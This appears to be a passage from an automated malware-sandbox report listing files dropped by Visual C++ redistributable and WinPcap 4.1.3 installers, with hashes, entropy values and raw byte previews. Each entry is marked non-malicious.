Preview:	MSCF...._WJ.....D..........................._WJ.8...........[.......Hk........S>\|. .F_CENTRAL_atl100_x64.H.U.Hk....S>\|. .F_CENTRAL_mfc100_x64.P....zW...S>\|. .F_CENTRAL_mfc100chs_x64.P.....X...S>\|. .F_CENTRAL_mfc100cht_x64.P...0.X...S>\|. .F_CENTRAL_mfc100deu_x64.P.....Y...S>\|. .F_CENTRAL_mfc100enu_x64.P....gZ...S>\|. .F_CENTRAL_mfc100esn_x64.P... a[...S>\|. .F_CENTRAL_mfc100fra_x64.P...p\\...S>\|. .F_CENTRAL_mfc100ita_x64.P....O]...S>\|. .F_CENTRAL_mfc100jpn_x64.P.....]...S>\|. .F_CENTRAL_mfc100kor_x64.P...`.^...S>\|. .F_CENTRAL_mfc100rus_x64.PyU..._...S>\|. .F_CENTRAL_mfc100u_x64.Pk........S>\|. .F_CENTRAL_mfcm100_x64.Pk..Pv....S>\|. .F_CENTRAL_mfcm100u_x64.PG.......S>\|. .F_CENTRAL_msvcp100_x64.P....(....S>.. .F_CENTRAL_msvcr100_x64.P...@.....S>\|. .F_CENTRAL_vcomp100_x64.P.........S>\|. .FL_msdia71_dll_2_60035_amd64_ln.3643236F_FC70_11D3_A536_0090278A1BB8.0d,2F=..[......w...d.5..o.{{{k.V..R.UZ.1.....z..1..Q.4+!.+TZ.ym..Nwwp.;..~.5..B..kE:..9y...iu.K..d..L....{....l....3..;...c.sf.9gw.<..P\|U

C:\4863269369430a9b27\vc_red.msi

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2010 x64 Redistributable, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219., Template: x64;0, Revision Number: {80902F2D-E1EF-43CA-B366-74496197E004}, Create Time/Date: Sun Feb 20 06:51:54 2011, Last Saved Time/Date: Sun Feb 20 06:51:54 2011, Number of Pages: 200, Name of Creating Application: Windows Installer XML (3.5.0626.3), Security: 2, Number of Words: 2
Category:	dropped
Size (bytes):	177664
Entropy (8bit):	6.308605018559318
Encrypted:	false
SSDEEP:	3072:dOTekSoT5jr0BDKE6wIZzx3U9oTCR7XxA5SNmjWVcqelSxbfU75B79o:MT9SoT5+DzE3Ere5Yi
MD5:	8F21BC0DC9E66F8E9D94197AE76698B3
SHA1:	B48A08FDE80F739657B819B94602F861F3FF57A4
SHA-256:	5763364634BDB2097B6DF6CDE79AC5CCE6069ACECF27254C589E3CABFFE53C2B
SHA-512:	88FD8870BC0F5DBDD2CB4A6A97CF4B1AB81D7FF77C2B2A4D1F6B34A730D0347A5022ECC8CA5B2E7C5F7C2CBE0486D5046CFAFCB8167E001E1AC5E1797D03278A
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\4863269369430a9b27\watermark.bmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PC bitmap, Windows 3.x format, 164 x 628 x 24
Category:	dropped
Size (bytes):	309032
Entropy (8bit):	6.583379857106919
Encrypted:	false
SSDEEP:	3072:yUDLmozgtuVYKKKvwUbKh5+/uWLspp2e1jSaMsb1bIZU0g0WQbO//QGVYBtGKQgc:yUDLmozvygKjzbIGgBZBkUfDfc
MD5:	1A5CAAFACFC8C7766E404D019249CF67
SHA1:	35D4878DB63059A0F25899F4BE00B41F430389BF
SHA-256:	2E87D5742413254DB10F7BD0762B6CDB98FF9C46CA9ACDDFD9B1C2E5418638F2
SHA-512:	202C13DED002D234117F08B18CA80D603246E6A166E18BA422E30D394ADA7E47153DD3CCE9728AFFE97128FDD797FE6302C74DC6882317E2BA254C8A6DB80F46
Malicious:	false
Preview:	BM(.......6...(.......t.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinPcap\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	121106
Entropy (8bit):	7.561672524856586
Encrypted:	false
SSDEEP:	3072:NgXdZt9P6D3XJ6ceA6V/EsqmU95VZNFe3J5eA+OC:Ne34wmWemUldiYn3
MD5:	C0F94449E113FA3F7EB420C64108B58B
SHA1:	2FC0779B5C0D560B4A085E452898B64775C9C3A6
SHA-256:	348E87F7ECDB9E2D600370029A95A31DD3172D29454FCD4AFAEE8199285B0EDE
SHA-512:	A5D315DE21CA4EAC6C9599530C705A15ED4FCCE2FBD0594AC493ED64E5DBB1215412C8B88898AB36E2574A45BD0335151F503632937640C6B7218DDFFA29A72C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................@...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinPcap\WinPcapInstall.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	93944
Entropy (8bit):	5.944064737500921
Encrypted:	false
SSDEEP:	1536:s7xjrG5m+619YG7L2xo8JfmL4iMtgLZtAeYjFH:s7s27yaL4kVtAeE9
MD5:	E78291558CB803DFD091AD8FB56FEECC
SHA1:	4BDE2F87E903FE8D3BD80179C5584CEC7A8CBDC4
SHA-256:	D9F4CD9F0E1BC9A138FB4DA6F83C92C3E86EB3DE4F988D5943D75C9B1DC6BB9D
SHA-512:	042B96BC2C0E6D8B6E2730426938EB7400FD833BE8A108A4942F559FEDEFABC35FD5DCB7EA1898D377B4382C0A9AF8EEEEBD663A4C852C706E3BD168C1F1F62F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;6...W...W...W..X...oW..X..._W..X....W...X..\|W...X..xW...W...W..X...\|W..X...~W..X...~W..X...~W..Rich.W..........PE..L.....0Q...........!.................*.......................................`.......r..........................................P....0...............P.......@..T.......................................@...............h............................text...4........................... ..`.rdata../'.......0..................@..@.data...H,....... ..................@....rsrc........0....... ..............@..@.reloc.......@... ...0..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\WinPcap\install.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	422
Entropy (8bit):	4.236551634935044
Encrypted:	false
SSDEEP:	12:j1Ib0V1j3WKcjHgVXnFMqSv9ZEjhZJd5hr1C:jyb0VhaA9FMPv9ZEjhXNc
MD5:	D3A2BC3BA963A1C99679AADFE8BD4519
SHA1:	51D69987D2AEA4510E3C1484FE1B6168B393A8B6
SHA-256:	2F8CB362E387E17AFCD55D982DB30F2BD5DB0AA8242C89BC35EF3EEA32AE4E08
SHA-512:	1587C2DFF4231AD25F09EB0CFD49C282DCDA95F8B785C6E0227740F9469B139A9A2F582DBEA73A322F984C52FAE8AD63678D47B2D34B156674F2E3FFB34DF6B2
Malicious:	false
Preview:	WinPcap 4.1.0.2980 Installation LOG..-----------------------------------------------------..Debug Information......Operating system detected on registry: 8 - AMD64..True operating system (kernel.dll): 8 - AMD64..npptools.dll present on the system: false..netnm.inf present on the system: false..nmnt.sys present on the system: false....End of log..-----------------------------------------------------..

C:\Program Files (x86)\WinPcap\rpcapd.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	118520
Entropy (8bit):	6.264101912948104
Encrypted:	false
SSDEEP:	3072:mL7m5RTfrUna0m2BeIIgJ3155FulLfbt/6:C7m5RTEaseIH515qfA
MD5:	83A6C2CAFE236652D1559640594A0EA8
SHA1:	C99AA678F387C00C4470FA3CD7B037D26720960D
SHA-256:	52360F17C9C70C9CEA3316560B40C4D89FD705ED7E6B6088C99FC54D4CC35EB5
SHA-512:	4F6981C4E8D64311087795E9639516409BF80EBCA5C7F25AF1FB436AACCF90F24617ECD3F95B63558981B12BC0E5EEACF120FEA7BE5E5FA05ECF3AFA4F9F799B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........z...)...)...).w.)...).w.)...).w.)..)V..)...)}..)...).w.)...)...))..).w.)...).w.)...).w.)...)Rich...)................PE..L...9.0Q.................0...p......%........@....@..................................(.......................................k.......p..8...........................pB...............................f..@............@..,............................text...X-.......0.................. ..`.rdata..v6...@...@...@..............@..@.data............ ..................@....rsrc...8....p......................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xf63089d5, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.25075138808051245
Encrypted:	false
SSDEEP:	384:0+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:LSB2nSB2RSjlK/+mLesOj1J2
MD5:	D23EA898464BC680833171C670A793CB
SHA1:	58AE690EEDC865012717E64E50A833B8456500A5
SHA-256:	C0BA1B0A6E90A15D5B896F190F42BB103B52C3EAE3EE2339EC321277E48BBB3A
SHA-512:	629DBEA240FA39734F29DF015D845D21554DE91804E0EB10E03B237608FA9E8ECB7F31A8C9010382C078480B8C017B21A409A0F2A7C3A505440153544FCAAC98
Malicious:	false
Preview:	.0..... ................e.f.3...w........................&..........w..3,...zw.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................"m^.3,...z......................3,...z..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap\Uninstall WinPcap 4.1.3.lnk

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	798
Entropy (8bit):	3.3994845409342553
Encrypted:	false
SSDEEP:	12:8wl0+0a/ledp8A/a/GcybdpYyhGZ9+r4Q/CNUvH4t2Y+xIBjK:85dOAC/SdBhs+DOUF7aB
MD5:	0F03424383D8949357F104893C5E3C46
SHA1:	8FA88571B7D3C34F800ACC37EAE8CC9EAAB55719
SHA-256:	727BF6BB72CAE94DBA21F75B50FEC404719F8E66AC6371CB0B5AFDD5E68F1FDE
SHA-512:	5D4FCD722026B013C9B9B0C9B73A9139FF2C78F984D41303DE639AD8307C746DBA3738BA84A043B4DECB63ECC50FB07B644D6E9216C5B2C0D0DABFFC49C047D8
Malicious:	false
Preview:	L..................F........................................................g....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".V.1...........WinPcap.@............................................W.i.n.P.c.a.p.....h.2...........uninstall.exe.L............................................u.n.i.n.s.t.a.l.l...e.x.e.......;.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.W.i.n.P.c.a.p.\.u.n.i.n.s.t.a.l.l...e.x.e...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.........*................@Z\|...K.J.....................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.................

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap\WinPcap Web Site.url

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<http://www.winpcap.org/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.461050149972742
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/0S4/Wov:HRYFVm/r4/Wy
MD5:	4045C586E0A52F8D15E34642A688FA3B
SHA1:	B5D50D25D5802B59C6DE5499E251913DFFAB58FE
SHA-256:	66DB8411780D0E4B9C09475241E1A8578A3A26A438A0E016722DB5D174055F43
SHA-512:	E5581162D69D4EC997DDF1342CC6A0532CEDFCB81F5E257EA0231AC68B43A52D7BBE7C8C20F1943F5C83C815BE9A5F47F2FECCEEC1BB8B8C5DE48C41144C8437
Malicious:	false
Preview:	[InternetShortcut]..URL=http://www.winpcap.org/..

C:\ProgramData\Package Cache\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\state.rsm

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	data
Category:	dropped
Size (bytes):	724
Entropy (8bit):	2.6071841733564667
Encrypted:	false
SSDEEP:	12:IhZK34pgMClGttDK+xUFZMAKL+ftun2QxloRKMJsW+Q1s3J:IvKUgMClc2ZMAKLoryQ1W
MD5:	E360B5FF16C83AB49FD3038DCCF95558
SHA1:	873A2F58371EBFCAFC9F26DFD4B509BCC5B15FFF
SHA-256:	8CB9D4BF8AC1F8803034F309B29A230C09C7AFD3B07B290AF59335D4ACAF9234
SHA-512:	840D1D412F7A8C6EF94FCBFD3853F36A0D379E03C47702D85C4DCD76B125DCDD9DC687B6A6FE6DDE197F2211B324DE0AD96DDE228BAF45A639DFBB18FB8ED415
Malicious:	false
Preview:	=.......................................................................................................................................................................................................................W.i.x.B.u.n.d.l.e.F.o.r.c.e.d.R.e.s.t.a.r.t.P.a.c.k.a.g.e.................W.i.x.B.u.n.d.l.e.L.a.s.t.U.s.e.d.S.o.u.r.c.e.....................W.i.x.B.u.n.d.l.e.N.a.m.e.....<...M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.3. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.2...0...3.0.5.0.1.........W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.....F...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.v.c.r.e.d.i.s.t._.2.0.1.3._.x.6.4...e.x.e.............

C:\ProgramData\Package Cache\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\vcredist_x64.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	463072
Entropy (8bit):	6.936983169881084
Encrypted:	false
SSDEEP:	12288:xymOcB+pwPprnVmLmDsC+FU+ZOSzh9tz+nuE8C:xLOsDFncLmKDZOSzLF+j
MD5:	A859C6F5517C0A03A11A60EBFFBFDF09
SHA1:	330A9C1A84CD6D910720757948812196550A63B8
SHA-256:	9A66F20E46202FDF673CED6CEBE76D4BFD7FE6B62DB391C5DA9BAEF59F89CA46
SHA-512:	FF8D8C64F2804BDF90E38C0335F01B376710CEE2E41DA84D20B494909D0AA8F1643E7DF6E2A11145AFDDEA609A0473307E76839E655E8F2DD23C38A53665C9E7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.V...8...8...8.......8.....n.8......8......8...9.I.8.....l.8.......8.......8.......8.Rich..8.................PE..L....._S.....................,.......~............@..........................0......:7....@.................................t!..,........7..........0....>......$2......................... ...........@............................................text...t........................... ..`.rdata..............................@..@.data... 0...@.......,..............@....wixburn8............<..............@..@.tls.................>..............@....rsrc....7.......8...@..............@..@.reloc...B.......D...x..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20220419164500.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	5991
Entropy (8bit):	5.45168378396037
Encrypted:	false
SSDEEP:	96:ls0yMRGjBp0M3mzlCetXaNtXGPZPg7bYYZrogro26yN6MYfmtfmdfmDjJ0fmmr9k:PRG95WWhZVYmQy0Xr9UlXENLIcULIctx
MD5:	8B65768222F69151B64EE672F2B96F8F
SHA1:	1074E8E60D460B22C7D938F22285079749C1F96D
SHA-256:	D0C8B4C1F190DC617DBADE7B8498BE162FC7C94914A0BEA3352B4AB5D4935EC6
SHA-512:	5807F71D5C34A826D2D5102610943F62E7F1ABA772F16CE60C389E134F1F1738B982B294C980824ECE123F181026AC03C60FCC3D95E61DFBB00B653BA7A1D52C
Malicious:	false
Preview:	[18F0:18F8][2022-04-19T16:44:52]i001: Burn v3.7.2829.0, Windows v6.3 (Build 9600: Service Pack 0), path: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe, cmdline: '/q /norestart -burn.unelevated BurnPipe.{2D277E6C-5CDF-4BE9-BD86-D80206082B4F} {7764B93C-9D98-4483-A035-10A63673DA0D} 6716'..[18F0:18F8][2022-04-19T16:45:00]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20220419164500.log'..[18F0:18F8][2022-04-19T16:45:00]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe'..[18F0:18F8][2022-04-19T16:45:01]i000: Setting string variable 'WixBundleName' to value 'Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501'..[18F0:18F8][2022-04-19T16:45:01]i100: Detect begin, 2 packages..[18F0:18F8][2022-04-19T16:45:02]i102: Detected related bundle: {050d4fc8-5d48-4b8f-8972-47c82c46020f}, type: Upgrade, scope: PerMachine, versi

C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\ExecDos.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	4.881160720969831
Encrypted:	false
SSDEEP:	48:6jOBtU/BXN8kUByyy/Aklkcrkyg7Vg5RibGoTCTo0gqVeeaeQqzM5rv774YRljmB:y/DMy4ncrkyg7tbpQFLUEYRxe
MD5:	A7CD6206240484C8436C66AFB12BDFBF
SHA1:	0BB3E24A7EB0A9E5A8EAE06B1C6E7551A7EC9919
SHA-256:	69AC56D2FDF3C71B766D3CC49B33B36F1287CC2503310811017467DFCB455926
SHA-512:	B9EE7803301E50A8EC20AB3F87EB9E509EA24D11A69E90005F30C1666ACC4ED0A208BD56E372E2E5C6A6D901D45F04A12427303D74761983593D10B344C79904
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.......................B..........Rich...........PE..L.....F...........!................F........ ...............................P.......................................#..c...x ..<............................@....................................................... ..x............................text...L........................... ..`.rdata..c.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\InstallOptions.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.550299117674118
Encrypted:	false
SSDEEP:	192:86d+dHXLHQOPiY53uiUdigyU+WsPdc/A1A+2jwK72dwF7dBEnbok:86UdHXcIiY535zBt2jw+BEnbo
MD5:	325B008AEC81E5AAA57096F05D4212B5
SHA1:	27A2D89747A20305B6518438EFF5B9F57F7DF5C3
SHA-256:	C9CD5C9609E70005926AE5171726A4142FFBCCCC771D307EFCD195DAFC1E6B4B
SHA-512:	18362B3AEE529A27E85CC087627ECF6E2D21196D725F499C4A185CB3A380999F43FF1833A8EBEC3F5BA1D3A113EF83185770E663854121F2D8B885790115AFDF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.p..q.,.q.,.q.,.q.,@q.,.~C,.q.,\R.,.q.,\R/,.q.,.w.,.q.,.Q.,.q.,Rich.q.,........................PE..L......K...........!.........<.......).......0.......................................................................8..p...81.......p..........................@....................................................0..8............................text...@........................... ..`.rdata.......0....... ..............@..@.data... (...@.......*..............@....rsrc........p.......2..............@..@.reloc...............4..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\System.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.568877095847681
Encrypted:	false
SSDEEP:	192:7DKnJZCv6VmbJQC+tFiUdK7ckD4gRXKQx+LQ2CSF:7ViJrtFRdbmXK8+PCw
MD5:	C17103AE9072A06DA581DEC998343FC1
SHA1:	B72148C6BDFAADA8B8C3F950E610EE7CF1DA1F8D
SHA-256:	DC58D8AD81CACB0C1ED72E33BFF8F23EA40B5252B5BB55D393A0903E6819AE2F
SHA-512:	D32A71AAEF18E993F28096D536E41C4D016850721B31171513CE28BBD805A54FD290B7C3E9D935F72E676A1ACFB4F0DCC89D95040A0DD29F2B6975855C18986F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L......K...........!................0).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text...1........................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\UserInfo.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.331979080664426
Encrypted:	false
SSDEEP:	48:iViF7LLM4wXqQH1wRrOpArXMVyjlZSXRN:ky7EcQHu4tVy4R
MD5:	7579ADE7AE1747A31960A228CE02E666
SHA1:	8EC8571A296737E819DCF86353A43FCF8EC63351
SHA-256:	564C80DEC62D76C53497C40094DB360FF8A36E0DC1BDA8383D0F9583138997F5
SHA-512:	A88BC56E938374C333B0E33CB72951635B5D5A98B9CB2D6785073CBCAD23BF4C0F9F69D3B7E87B46C76EB03CED9BB786844CE87656A9E3DF4CA24ACF43D7A05B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................4..............Rich..................PE..L......K...........!......................... ...............................P...................................... "......L ..<............................@..d.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...X....0......................@....reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\bootOptions.ini

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	370
Entropy (8bit):	5.305010120952837
Encrypted:	false
SSDEEP:	6:aY+ZPr3QMtNuJO4q2k3KfuRoeRm8FXpzXbRAFFIgnfvu75HBkyYm1KKoazn:ZYrltNukF2kafF8zmFigfvuNHEYKKo+n
MD5:	900BC8ABE4E198608DB3FFF6807DDF97
SHA1:	1C962C808FA8B166D504FF6590E895E254B17194
SHA-256:	629DD202B63D8DA8D75AB349EFBCCEC7C862A65357C2AB4DEC413BCABDC0C057
SHA-512:	342836EB7442A41BD510471CCD7E5E5A696FD17B027063C0C1EC3606BF208B0BE63BF797108E23C67A76CBB2E0919114C92B93C103AE45E33C0501908CB7B119
Malicious:	false
Preview:	; Ini file generated by the HM NIS Edit IO designer...[Settings]..NumFields=1..RTL=0..State=0....[Field 1]..Type=Checkbox..Text=Automatically start the WinPcap driver at boot time..Left=8..Right=198..Top=36..Bottom=46..State=1....;[Field 2]..;Type=Text..;Flags=NOTABSTOP\|MULTILINE\|READONLY..;State=Text\r\nPirla..;Left=8..;Right=279..;Top=70..;Bottom=136....HWND=66700..

C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\ioSpecial.ini

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	556
Entropy (8bit):	5.379999989970046
Encrypted:	false
SSDEEP:	12:lOuf9VTsAgQRvAYfk4+hGZ4gNhBYyafd4gND2IrEjl8s3NK:1TdRvAYfmhI1RYd1ZlrEj1Y
MD5:	FBCA365DE00F0C2054D9B2BFBC34196C
SHA1:	333654ED4D26D3FD33D863CECC95E4248FEB6F34
SHA-256:	C84F26FD4205912B5B2180CDDD3039EC4D8C2016857F4DFD0866786ED69D2E71
SHA-512:	02EAF8679657F2E848FC00146F3DF3FB48E05E57FC3E62FCED2406A7950A57BD869E4177643DA5B943DA0C161F1F45F7580B394B50963BCEA3F8ED1B4D93C684
Malicious:	false
Preview:	[Settings]..Rect=1044..NumFields=3..RTL=0..NextButtonText=&Finish..CancelEnabled=..State=0..[Field 1]..Type=bitmap..Left=0..Right=109..Top=0..Bottom=193..Flags=RESIZETOFIT..Text=C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\modern-wizard.bmp..HWND=263200..[Field 2]..Type=label..Left=120..Right=315..Top=10..Text=Completing the WinPcap 4.1.3 Setup Wizard..Bottom=38..HWND=132218..[Field 3]..Type=label..Left=120..Right=315..Top=45..Bottom=185..Text=WinPcap 4.1.3 has been installed on your computer.\r\n\r\nClick Finish to close this wizard...HWND=132216..

C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\modern-header.bmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PC bitmap, Windows 3.x format, 175 x 58 x 24
Category:	dropped
Size (bytes):	30678
Entropy (8bit):	4.017046289283279
Encrypted:	false
SSDEEP:	192:UdCd/28k2hZrlQ+jP3/PGs/ZkTnSQpuWE:UD8jLlQ+jP3///ZUSJ5
MD5:	D8F59A707B2A5000C7903595EDDC3D48
SHA1:	E86239FE1DC3CFDBEC6006817160EB5F1FC92BCA
SHA-256:	C0E284FDE834FE8A6F90504DBA7ABFF25B1E7DD4611483341203FD3EFC5DE8A6
SHA-512:	91E28A685733620832D3851D7F3EEE36495F2728610BD6C66F305CDDA039F75AB8499D0E51E64AFA018C221A728889503DB2FC7C84CF9599A61B68951686B048
Malicious:	false
Preview:	BM.w......6...(.......:............w....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\modern-wizard.bmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe
File Type:	PC bitmap, Windows 3.x format, 164 x 314 x 4
Category:	dropped
Size (bytes):	26494
Entropy (8bit):	1.9568109962493656
Encrypted:	false
SSDEEP:	24:Qwika6aSaaDaVYoG6abuJsnZs5GhI11BayNXPcDrSsUWcSphsWwlEWqCl6aHAX2x:Qoi47a5G8SddzKFIcsOz3Xz
MD5:	CBE40FD2B1EC96DAEDC65DA172D90022
SHA1:	366C216220AA4329DFF6C485FD0E9B0F4F0A7944
SHA-256:	3AD2DC318056D0A2024AF1804EA741146CFC18CC404649A44610CBF8B2056CF2
SHA-512:	62990CB16E37B6B4EFF6AB03571C3A82DCAA21A1D393C3CB01D81F62287777FB0B4B27F8852B5FA71BC975FEAB5BAA486D33F2C58660210E115DE7E2BD34EA63
Malicious:	false
